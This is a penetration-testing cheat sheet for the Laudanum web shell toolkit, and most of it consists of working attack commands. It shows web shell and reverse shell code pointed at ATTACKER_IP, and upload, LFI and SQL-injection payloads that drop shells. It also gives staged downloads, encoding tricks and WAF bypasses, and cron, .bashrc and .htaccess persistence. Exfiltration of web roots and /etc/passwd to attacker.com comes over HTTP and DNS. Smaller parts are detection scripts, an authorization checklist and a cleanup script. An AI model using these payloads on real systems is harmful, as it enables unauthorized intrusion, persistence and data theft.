
Laudanum

Laudanum is a collection of pre-built, injectable web shells and reverse shell scripts designed for authorized penetration testing. It includes shells for multiple web technologies (ASP, ASPX, PHP, Perl, JSP, ColdFusion) and provides payloads for establishing reverse connections, spawning shells, and executing arbitrary commands on compromised web servers. Used by authorized security professionals for post-exploitation and lateral movement exercises.

# Clone Laudanum from GitHub
git clone https://github.com/laudanum/laudanum.git
cd laudanum

# List available shells
ls -la

# Directory structure
# ├── aspx/
# ├── asp/
# ├── php/
# ├── perl/
# ├── jsp/
# ├── cfm/
# └── shell_finder/
# Install dependencies
apt-get update
apt-get install curl wget netcat-openbsd

# Optional: PHP CLI for testing
apt-get install php-cli

# Make scripts executable
chmod +x laudanum/*/shell_finder/*
# Using Homebrew
brew install curl wget netcat

# Clone repository
git clone https://github.com/laudanum/laudanum.git

# Navigate to directory
cd laudanum
| Shell File | Type | Purpose |
|---|---|---|
| php/shell.php | Interactive shell | Full command execution |
| php/reverse.php | Reverse shell | Establish reverse connection |
| php/upload.php | File upload | Upload files to server |
| php/info.php | System info | Enumerate server details |
| Shell File | Type | Purpose |
|---|---|---|
| aspx/shell.aspx | Interactive shell | Windows server exploitation |
| aspx/reverse.aspx | Reverse shell | Reverse ASPX connection |
| asp/shell.asp | Legacy shell | Classic ASP applications |
| aspx/cmdasp.aspx | Command shell | Execute system commands |
# Copy PHP shell to web directory
cp laudanum/php/shell.php /var/www/html/

# Verify deployment
curl http://target.com/shell.php

# Test command execution
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?cmd=whoami"
curl "http://target.com/shell.php?cmd=uname%20-a"
# Rename to bypass detection
cp laudanum/php/shell.php /tmp/config.php

# Upload via vulnerable form
# Using curl to POST file
curl -X POST -F "upload=@/tmp/config.php" \
  http://target.com/upload.php

# Or use with XXE/LFI vulnerabilities
# URL encode the shell content
echo '<?php system($_GET["c"]); ?>' | base64
# Result: PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOyA/Pg==
# Common parameter variations
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?c=id"
curl "http://target.com/shell.php?cmd=whoami"
curl "http://target.com/shell.php?command=id"
curl "http://target.com/shell.php?exec=id"
curl "http://target.com/shell.php?system=id"
// From laudanum/php/reverse.php
<?php
$sock=fsockopen("ATTACKER_IP",PORT);
exec("/bin/bash -i <&3 >&3 2>&3");
?>

// Usage:
// 1. Modify ATTACKER_IP and PORT
// 2. Set up listener: nc -lvnp PORT
// 3. Upload and access shell
# Terminal 1: Set up listener
nc -lvnp 4444

# Terminal 2: Access reverse shell
curl http://target.com/reverse.php
# Or upload and execute if automated

# Connection established - full shell access
id
whoami
pwd
ls -la
# Copy ASPX reverse shell
cp laudanum/aspx/reverse.aspx /tmp/

# Modify connection details
sed -i 's/LHOST/192.168.1.100/g' reverse.aspx
sed -i 's/LPORT/4444/g' reverse.aspx

# Upload to ASP.NET application
# Access via: http://target.com/shell.aspx
# Use shell_finder to locate Laudanum shells
cd laudanum/shell_finder

# Find PHP shells in directory
./shell_finder.py /path/to/webroot --php

# Find all shell types
./shell_finder.py /path/to/webroot --all

# Recursive search
./shell_finder.py /var/www/html -r
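# Signature detection for Laudanum-style shells dropped under a web root.
#
# Usage: bash <this file> [WEBROOT]        (default: /var/www/html)
# Prints candidate paths on stdout, one per line; find/grep diagnostics go to
# stderr.  Exit status: 0 candidates found, 1 none found, 2 WEBROOT unusable.
# Every hit is a lead, not a verdict: legitimate code also calls exec()/system().

# Files whose *names* match the shells shipped in php/, asp/ and aspx/ above.
# A content grep for "shell.php" does not see a shell's own file name, so the
# name match is done separately with find.
find_shells_by_name() {
  local webroot=$1
  find "$webroot" -type f \( -name shell.php -o -name reverse.php \
    -o -name upload.php -o -name info.php -o -name shell.aspx \
    -o -name reverse.aspx -o -name shell.asp -o -name cmdasp.aspx \) -print
}

# Files whose *contents* reference a shipped shell name (this is what catches
# an .htaccess auto_prepend_file line or a cron entry pointing at shell.php)
# or call the execution/socket primitives the shells above rely on.
# -E replaces the GNU-only \| alternation, -I skips binaries, -l lists each
# file once instead of every matching line, and the escaped paren keeps
# `exec(` / `shell_exec(` while dropping words like "execute".
find_shells_by_content() {
  local webroot=$1
  grep -rIlE -- 'shell\.php|reverse\.aspx|fsockopen\(|exec\(|passthru\(|system\(|eval\(|assert\(' "$webroot"
}

# Entry point: merge both searches, de-duplicated and sorted byte-wise so the
# output is stable across runs and locales.
scan_webroot_for_shells() {
  local webroot=${1:-/var/www/html}
  if [[ ! -d "$webroot" ]]; then
    printf 'not a directory: %s\n' "$webroot" >&2
    return 2
  fi
  local hits
  hits=$({ find_shells_by_name "$webroot"; find_shells_by_content "$webroot"; } | LC_ALL=C sort -u)
  [[ -n "$hits" ]] || return 1
  printf '%s\n' "$hits"
}

scan_webroot_for_shells "$@"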
# Stage 1: Drop initial shell via vulnerability
curl -X POST -d 'file=<?php include("http://attacker.com/shell.php"); ?>' \
  http://target.com/vulnerable.php

# Stage 2: Second stage downloads full featured shell
# Shell 1 fetches Shell 2
curl -o /tmp/shell2.php http://attacker.com/shell2.php

# Stage 3: Executes with higher privileges or automation
php /tmp/shell2.php
# Base64 encode shell for bypass
base64 -w0 laudanum/php/shell.php > shell.b64

# Gzip compression
gzip -c laudanum/php/shell.php > shell.php.gz

# ROT13 encoding
tr 'A-Za-z' 'N-ZA-Mn-za-m' < laudanum/php/shell.php > shell.rot13

# Deploy encoded version
echo '<?php include(gzuncompress(base64_decode("ENCODED_CONTENT"))); ?>' > shell.php
# Create cron job for persistence
<?php
$cmd = "curl http://attacker.com/shell.php > /tmp/shell.php && php /tmp/shell.php";
exec("echo '*/5 * * * * $cmd' | crontab -");
?>

# Add to startup scripts
echo 'php /var/www/html/shell.php' >> ~/.bashrc

# Modify web server configuration
echo 'php_flag auto_prepend_file /var/www/html/shell.php' >> .htaccess
# Vulnerable upload handler found
POST /upload.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data

--boundary
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: application/x-php

<?php system($_GET['c']); ?>
--boundary--

# Access shell
curl "http://target.com/uploads/image.php?c=id"
# If LFI exists, can include remote shell
http://target.com/page.php?file=http://attacker.com/shell.php

# Or include from /tmp if upload possible
http://target.com/page.php?file=/tmp/shell.php

# For wrapper exploitation
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=shell.php
# If SQL results written to file
'; SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; --

# MySQL example
sqlmap -u "http://target.com/?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php
| Command | Purpose |
|---|---|
| id | Show current user ID |
| whoami | Display current username |
| pwd | Print working directory |
| ls -la | List directory contents |
| cat /etc/passwd | Read system files |
| ifconfig | Network configuration |
| ps aux | Running processes |
# Enumerate system
uname -a
cat /etc/os-release
df -h
free -m

# Network reconnaissance
netstat -tuln
ss -tulnp
arp -a
route -n

# User enumeration
cat /etc/shadow  # If writable
getent passwd
sudo -l

# Privilege escalation checks
find / -perm -4000 2>/dev/null
find / -perm -2000 2>/dev/null
dpkg -l | grep sudo
# Compress sensitive data
tar czf - /var/www/html/ | curl -X POST -d @- http://attacker.com/recv.php

# Encode and transmit
cat /etc/passwd | base64 | curl -d @- http://attacker.com/log.php

# DNS exfiltration (if HTTP blocked)
nslookup $(cat file.txt | base64 -w 0).attacker.com
# Web Application Firewall (WAF) bypass
# Use URL encoding, double encoding, hex encoding
# Example: system() -> sy%73%74%65%6d()

# Content-Type bypass
# Upload as image but use PHP content

# Magic bytes bypass
# Prepend valid file header to PHP shell
# JPEG: FF D8 FF E0 ... <?php ... ?>
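# Defender-side triage for web shells dropped under a web root.
#
# Usage: bash <this file> <scan|audit|watch|recent> [ARGS]
#   scan   [WEBROOT]            list files calling exec/system/passthru/shell_exec
#   audit  [WEBROOT]            add an auditd watch for writes under WEBROOT (needs root)
#   watch  [ACCESS_LOG]         follow the access log and print shell-style requests
#   recent [WEBROOT] [MINUTES]  list files modified in the last MINUTES (default 60)
# Defaults: WEBROOT=/var/www/html, ACCESS_LOG=/var/log/apache2/access.log
# Every hit needs manual confirmation: legitimate code also calls these functions.

readonly DEFAULT_WEBROOT=/var/www/html
readonly DEFAULT_ACCESS_LOG=/var/log/apache2/access.log

# Files under WEBROOT whose contents call the execution primitives the shells
# on this page use.  Recursive (the glob form only looked at the top level and
# errored on subdirectories), -I skips binaries, -E replaces the GNU-only \|
# alternation.  `exec\(` also covers `shell_exec(`.
list_suspicious_files() {
  local webroot=${1:-$DEFAULT_WEBROOT}
  grep -rIlE -- 'exec\(|system\(|passthru\(' "$webroot"
}

# auditd watch for writes and attribute changes under WEBROOT, tagged "webshell".
# -p wa records file drops and permission changes; it does not record process
# execution, so the earlier "monitor process execution" label was misleading.
enable_webroot_audit() {
  local webroot=${1:-$DEFAULT_WEBROOT}
  auditctl -w "${webroot%/}/" -p wa -k webshell
}

# Follow the access log and print requests whose query string carries one of
# the command parameters the shells above read (cmd, c, command, exec, system).
# -F survives log rotation; --line-buffered keeps hits flowing when this is
# piped further.  The bare words "system|exec|cmd" matched far too much.
watch_access_log() {
  local log=${1:-$DEFAULT_ACCESS_LOG}
  tail -F -- "$log" | grep --line-buffered -E '[?&](cmd|c|command|exec|system)='
}

# Files under WEBROOT modified within the last MINUTES (default 60).  Replaces
# `-newer /tmp/marker`, which only works if a marker file was created earlier.
find_recent_files() {
  local webroot=${1:-$DEFAULT_WEBROOT}
  local minutes=${2:-60}
  find "$webroot" -type f -mmin "-$minutes" -ls
}

# Dispatch on the first argument; unknown/missing action prints usage, status 2.
main() {
  local action=${1:-}
  [[ $# -gt 0 ]] && shift
  case "$action" in
    scan)   list_suspicious_files "$@" ;;
    audit)  enable_webroot_audit "$@" ;;
    watch)  watch_access_log "$@" ;;
    recent) find_recent_files "$@" ;;
    *)
      printf 'usage: %s <scan|audit|watch|recent> [ARGS]\n' "${0##*/}" >&2
      return 2
      ;;
  esac
}

main "$@"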
# Use Laudanum shells with msfvenom
msfvenom -p php/reverse_php LHOST=192.168.1.100 LPORT=4444 -o shell.php

# Generate ASP.NET shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx > shell.aspx

# Generate handler
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
# Generate PowerShell shell
./empire -U "User" -P "Pass" -E "invoke-expression(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

# Stage through Laudanum PHP shell
<?php
$ps_code = base64_decode($_POST['d']);
exec("powershell -enc $ps_code");
?>
# Check PHP is enabled
curl http://target.com/info.php

# Verify shell syntax
php -l shell.php

# Check file permissions
ls -la /var/www/html/shell.php
# Should be readable by web server user

# Test with different parameter names
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?c=id"
curl "http://target.com/shell.php?command=id"
# Test listener is running
netstat -tuln | grep 4444

# Check firewall rules
sudo ufw status
sudo iptables -L -n

# Test reverse shell locally first
php laudanum/php/reverse.php
# With listener running first
nc -lvnp 4444
# Redirect errors to stdout
curl "http://target.com/shell.php?cmd=id%202%3E%261"

# Use alternative shells
<?php passthru($_GET['c']); ?>
<?php shell_exec($_GET['c']); ?>
<?php eval($_POST['c']); ?>
  • Written scope of work defining authorized targets
  • Explicit permission for shell deployment
  • Time-limited testing window
  • Secure handling and removal of shells post-engagement
  • Incident response procedures documented
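# Post-engagement cleanup: remove every artifact the sections above create,
# back out the persistence edits, then print a dated record for the report.
#
# Usage: bash <this file> [WEBROOT]        (default: /var/www/html)
# Run as the account that deployed the shells (its files and its crontab).
# The web server access log is deliberately left alone: it is the evidence
# trail for the engagement report, so it is referenced, not rewritten.
# Copies written to whatever working directory was used during the engagement
# (shell.b64, shell.php.gz, shell.rot13, msfvenom's shell.php/shell.aspx)
# are not reachable from here and must be removed from that directory.

# Remove PATH if present and say what happened; a bare `rm -f` would hide
# whether the artifact was ever there.
remove_artifact() {
  local path=$1
  if [[ -e "$path" ]]; then
    rm -f -- "$path" && printf 'removed %s\n' "$path"
  else
    printf 'not present %s\n' "$path"
  fi
}

# Delete every line of FILE containing the fixed string NEEDLE, in place.
# Backs out the ~/.bashrc and .htaccess entries.  No-op when FILE is absent or
# contains no match, so unrelated files are never rewritten.  The file is
# overwritten with cat rather than moved, keeping its owner and mode.
strip_lines_matching() {
  local file=$1 needle=$2 tmp
  [[ -f "$file" ]] || return 0
  grep -qF -- "$needle" "$file" || return 0
  tmp=$(mktemp) || return 1
  grep -vF -- "$needle" "$file" > "$tmp"   # status 1 only means no lines survived
  cat -- "$tmp" > "$file" && rm -f -- "$tmp"
}

# Drop crontab lines containing NEEDLE from the current user's crontab.
# Nothing happens when there is no crontab or no matching line.
remove_cron_entry() {
  local needle=$1 current
  current=$(crontab -l 2>/dev/null) || return 0
  if grep -qF -- "$needle" <<<"$current"; then
    grep -vF -- "$needle" <<<"$current" | crontab -
    printf 'removed crontab lines matching %s\n' "$needle"
  fi
}

# Entry point: files first, then persistence, then the record line.
cleanup_shells() {
  local webroot=${1:-/var/www/html}
  local f
  # Deployed, renamed and staged copies named in the sections above.
  for f in "$webroot/shell.php" "$webroot/reverse.aspx" "$webroot/uploads/image.php" \
           /tmp/shell.php /tmp/config.php /tmp/shell2.php /tmp/reverse.aspx; do
    remove_artifact "$f"
  done
  # Persistence: the re-fetching cron job, the .bashrc line and the
  # auto_prepend_file directive from the persistence section.
  remove_cron_entry 'php /tmp/shell.php'
  strip_lines_matching "$HOME/.bashrc" "php $webroot/shell.php"
  strip_lines_matching "$webroot/.htaccess" "auto_prepend_file $webroot/shell.php"
  # Engagement record: keep this line with the report.
  printf 'shell.php, reverse.aspx and staged copies under %s removed at %s\n' \
    "$webroot" "$(date -u '+%Y-%m-%d %H:%M UTC')"
}

cleanup_shells "$@"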
  • Laudanum GitHub Repository
  • OWASP Web Shell Testing
  • Reverse Shell Cheat Sheet
  • Web Application Exploitation Guide
  • Penetration Testing Execution Standard (PTES)